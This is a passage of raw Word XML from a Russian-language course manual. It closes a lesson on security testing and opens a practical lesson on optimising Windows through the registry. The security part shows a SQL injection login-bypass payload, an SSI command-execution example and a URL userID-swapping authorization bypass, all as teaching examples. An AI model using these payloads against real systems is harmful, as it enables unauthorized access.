    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE Name = 'tester'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AND Password = 'testpass';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вводим корректное имя ’tester’, а в поле пароль вводим строку:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>testpass' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В итоге, Если поле не имеет соответствующих валидаций или обработчиков данных, может вскрыться уязвимость, позволяющая зайти в защищенную паролем систему, т.к.SQL запрос примет следующий вид:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT Username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM Users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE Name = 'tester'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND Password = 'testpass' OR '1'='1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Условие '1'='1' всегда будет истинным и поэтому SQL запрос всегда будет возвращать много значений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server-Side Includes (SSI) Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В зависимости от типа операционной системы команды могут быть разными, как пример рассмотрим команду, которая выводит на экран список файлов в OS Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt; !--#</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пользователь А может получить доступ к документам пользователя Б. Допустим, есть реализация, где при просмотре своего профиля, содержащего конфеденциальную информацию, в URL страницы передается userID, а данном случае есть смысл попробовать подставить вместо своего userID номер другого пользователя. И если вы увидите его данные, значит вы нашли дефект.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вывод</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примеров уязвимостей и атак существует огромное количество. Даже проведя полный цикл тестирования безопасности, нельзя быть на 100% уверенным, что система по-настоящему обезопасена. Но можно быть уверенным в том, что процент несанкционированных проникновений, краж информации и потерь данных будет в разы меньше, чем у тех кто не проводил тестирования безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое тестирование безопасности?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие цели тестирования безопасности?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие существуют виды угроз?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_Toc26278734"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № 15 </w:t>
      </w:r>
      <w:r w:rsidR="00672A00" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оптимизация производительности ОС и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ПО</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="0067279E" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: приобрести навыки по оптимизации </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ОС и ПО</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067279E" w:rsidRPr="00617AC0" w:rsidRDefault="0067279E" w:rsidP="0067279E">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EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 1 Антивирусная чистка, корректировка работы ОС и ПО, оптимизация производительности ОС</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067279E" w:rsidRPr="00617AC0" w:rsidRDefault="0067279E" w:rsidP="0067279E">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткое теоретическое обоснование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">На предыдущих практических занятиях были изучены различные способы настройки и оптимизации ОС Windows. Были рассмотрены основные служебные средства (системные программные модули и оснастки), посредством которых ОС может быть конфигурирована оптимальным образом. Однако, осуществленные действия являются лишь предварительными и обеспечивают достаточно поверхностную настройку ОС. Иногда подобных действий достаточно, чтобы получить приемлемый результат, но для более </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>тонкой</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> настройки ОС практически всегда требуется вмешательство в системный Реестр. В конечном счете, такое вмешательство позволяет получить прирост в скорости реакции ОС на системные события и иногда значительно увеличить общую производительность системы в целом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оптимизация ОС посредством изменения значений системных параметров Реестра, как правило, подразумевает соответствующую квалификацию пользователя, чтобы гарантировать целостность Реестра и дальнейшую работоспособность системы. Некорректное или неумышленное изменение данных Реестра ОС может привести к непоправимым последствиям и обеспечить пользователя обременительной работой по повторной инсталляции системы. Чтобы этого избежать, необходимо перед проведением каких-либо манипуляций с Реестром ОС всегда осуществлять его предварительную архивацию и резервное сохранение в надежном месте на жестком диске. Выполнение этого правила в последствии обеспечит </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>откат</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> системного Реестра и вернет систему в рабочее состояние до момента критических изменений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">На основе теоретических сведений по организации Реестра, его структуре, возможностям редактирования и изменения значений некоторых ключевых параметров ОС, предполагается выполнить ряд учебных заданий по конфигурированию ОС Windows и, тем самым, осуществить дополнительную </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>тонкую</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> настройку системы с целью ее оптимальной, быстрой и эффективной работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перед началом выполнения заданий в среде ОС Windows необходимо осуществить следующее:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. запустить виртуальную машину с ОС Windows XP и активировать справочное меню (Пуск | Справка и поддержка);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. ознакомиться с описанием Реестра и возможностями его применения в ОС Windows XP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. ознакомиться с описанием и возможностями служебного программного средства </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Редактор Реестра</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Regedit), изучив справочный материал по данному приложению, находящийся в системном каталоге С:\Windows\Help\ в одноименном файле с расширением .chm;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. воспользовавшись ключом /?, ознакомиться с описанием и возможностями консольной утилиты Reg.exe для работы с Реестром ОС, доступной из командной строки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 2 Оптимизация, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>тонкая</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> настройка, корректировка ОС и ПО</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Теоретический материал</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мониторинг – система сбора или регистрации, хранения и анализа небольшого количества ключевых (явных или косвенных) признаков или параметров описания данного объекта для вынесения суждения о поведении или состоянии данного объекта в целом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
